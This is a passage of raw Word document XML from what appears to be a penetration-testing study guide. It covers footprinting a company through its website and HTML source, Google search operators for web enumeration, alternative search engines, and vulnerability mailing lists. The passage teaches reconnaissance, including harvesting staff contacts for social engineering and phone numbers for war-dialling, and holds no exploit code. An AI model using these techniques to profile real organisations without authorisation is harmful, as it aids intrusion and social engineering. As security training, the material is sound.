        <w:t xml:space="preserve">), phone/fax numbers. All of this data is useful for an attacker who is footprinting the target company as the information will be useful in social engineering attacks. Company phone/fax numbers can also provide target information for wardialling attacks. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00664450" w:rsidRPr="00C741C1" w:rsidRDefault="00664450" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C741C1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The websites may also contain news related to recent acquisitions which could broaden the potential attack scope.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00664450" w:rsidRPr="00C741C1" w:rsidRDefault="00664450" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C741C1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">HTML source can contain </w:t>
      </w:r>
      <w:r w:rsidR="00C741C1" w:rsidRPr="00C741C1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>comments and other details that provide with a better unde</w:t>
      </w:r>
      <w:r w:rsidR="00C741C1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rstanding of the target. Examples of information that can be obtained are</w:t>
      </w:r>
      <w:r w:rsidR="00C741C1" w:rsidRPr="00C741C1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C741C1" w:rsidRPr="00C741C1" w:rsidRDefault="00C741C1" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C741C1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Technology in use (server/web components)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C741C1" w:rsidRPr="00C741C1" w:rsidRDefault="00C741C1" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C741C1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Developer details such as names, emails, code changes and the reasons for them</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C741C1" w:rsidRPr="00C741C1" w:rsidRDefault="00C741C1" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C741C1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>File system path information of hosting or internal servers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C741C1" w:rsidRPr="00C741C1" w:rsidRDefault="00C741C1" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C741C1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Details of other interconnected servers or applications (e.g. Databases)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C741C1" w:rsidRPr="00C741C1" w:rsidRDefault="00C741C1" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C741C1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Source code filenames and possibly snippets of content or code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C741C1" w:rsidRPr="00C741C1" w:rsidRDefault="00C741C1" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C741C1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Hidden form fields related to security or disclosing information of internal workings or application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRPr="00C741C1" w:rsidRDefault="00C741C1" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C741C1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Internal network IP addresses</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRDefault="00B50C46" w:rsidP="00B50C46">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C4 - </w:t>
      </w:r>
      <w:r w:rsidRPr="00B50C46">
        <w:t>Google Hac</w:t>
      </w:r>
      <w:r>
        <w:t>king and Web Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRDefault="00B50C46" w:rsidP="00B50C46">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C4a - </w:t>
      </w:r>
      <w:r w:rsidRPr="00B50C46">
        <w:t xml:space="preserve">Effective use of search engines and other public data sources to </w:t>
      </w:r>
      <w:r>
        <w:t>gain information about a target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F52AEB" w:rsidRPr="00EB26B7" w:rsidRDefault="00F52AEB" w:rsidP="00B50C46">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>As web crawlers scour the Internet’s web sites for content, they catalogue pieces of potentially useful information. Search engines, such as Google, now provide advanced search functions that allow attackers to build a clearer picture of the network that they plan to attack. In particular, the following types of information are easily found:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F52AEB" w:rsidRPr="00EB26B7" w:rsidRDefault="00F52AEB" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Employee contact details and information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F52AEB" w:rsidRPr="00EB26B7" w:rsidRDefault="00F52AEB" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Email addresses</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F52AEB" w:rsidRPr="00EB26B7" w:rsidRDefault="00F52AEB" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Direct Dial In (DDI) telephone numbers (useful for war-dialling)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F52AEB" w:rsidRPr="00EB26B7" w:rsidRDefault="00F52AEB" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Physical addresses of offices from which employees are based</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F52AEB" w:rsidRPr="00EB26B7" w:rsidRDefault="00F52AEB" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Details of internal email systems</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F52AEB" w:rsidRPr="00EB26B7" w:rsidRDefault="00F52AEB" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DNS layout and naming conventions, including domains and hostnames</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F52AEB" w:rsidRPr="00EB26B7" w:rsidRDefault="00F52AEB" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Documents that reside on publically accessible servers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRPr="00EB26B7" w:rsidRDefault="00F52AEB" w:rsidP="00B50C46">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB26B7" w:rsidRPr="00EB26B7" w:rsidRDefault="00EB26B7" w:rsidP="00B50C46">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Advanced G</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>oogle filters:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB26B7" w:rsidRPr="00EB26B7" w:rsidRDefault="00EB26B7" w:rsidP="00EB26B7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>explicitly</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> including search_term</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB26B7" w:rsidRPr="00EB26B7" w:rsidRDefault="00EB26B7" w:rsidP="00EB26B7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> including search_term</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site</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>find search term only on site specified by search_term. YES</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filetype</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">search documents of type search_term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link</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as a link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cache</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>display the cached version of page specified by search_term</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intitle</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in the title of a page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lastRenderedPageBreak/>
        <w:t>inurl</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in the URL of the page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site</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>find web pages on a specific web site</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB26B7" w:rsidRPr="00EB26B7" w:rsidRDefault="00EB26B7" w:rsidP="00B50C46">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB26B7" w:rsidRPr="00EB26B7" w:rsidRDefault="00EB26B7" w:rsidP="00B50C46">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Google does not appear to like too many of these advanced queries so alternative search engines can be used:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB26B7" w:rsidRPr="00EB26B7" w:rsidRDefault="00EB26B7" w:rsidP="00B50C46">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB26B7" w:rsidRPr="00EB26B7" w:rsidRDefault="00130CD5" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidR="00EB26B7" w:rsidRPr="00EB26B7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://www.dogpile.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00EB26B7" w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EB26B7" w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB26B7" w:rsidRDefault="00130CD5" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidR="00EB26B7" w:rsidRPr="00EB26B7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://www.altavista.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00EB26B7" w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB26B7" w:rsidRDefault="00130CD5" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId35" w:history="1">
        <w:r w:rsidR="00EB26B7" w:rsidRPr="00562945">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://uk.yahoo.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00EB26B7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB26B7" w:rsidRPr="00EB26B7" w:rsidRDefault="00130CD5" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId36" w:history="1">
        <w:r w:rsidR="00EB26B7" w:rsidRPr="00562945">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://www.bing.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00EB26B7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB26B7" w:rsidRPr="00EB26B7" w:rsidRDefault="00EB26B7" w:rsidP="00B50C46">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB26B7" w:rsidRPr="00EB26B7" w:rsidRDefault="00EB26B7" w:rsidP="00B50C46">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB26B7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The following sites are good sources of vulnerability information providing details of known vulnerabilities within specific software versions and platforms:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB26B7" w:rsidRDefault="00EB26B7" w:rsidP="00B50C46">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB26B7" w:rsidRPr="00761B11" w:rsidRDefault="00EB26B7" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00761B11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Bugtraq</w:t>
      </w:r>
      <w:r w:rsidRPr="00761B11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00761B11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00761B11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00761B11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>mailing list (</w:t>
      </w:r>
      <w:hyperlink r:id="rId37" w:history="1">
        <w:r w:rsidR="00761B11" w:rsidRPr="00562945">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://www.securityfocus.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00761B11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761B11" w:rsidRPr="00761B11" w:rsidRDefault="00EB26B7" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00761B11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Vulnwatch</w:t>
      </w:r>
      <w:r w:rsidRPr="00761B11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00761B11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00761B11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>mailing list (</w:t>
      </w:r>
      <w:hyperlink r:id="rId38" w:history="1">
        <w:r w:rsidR="00761B11" w:rsidRPr="00761B11">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://www.vulnwatch.org/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00761B11" w:rsidRPr="00761B11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761B11" w:rsidRPr="00761B11" w:rsidRDefault="00761B11" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00761B11">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Full </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>disclosure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
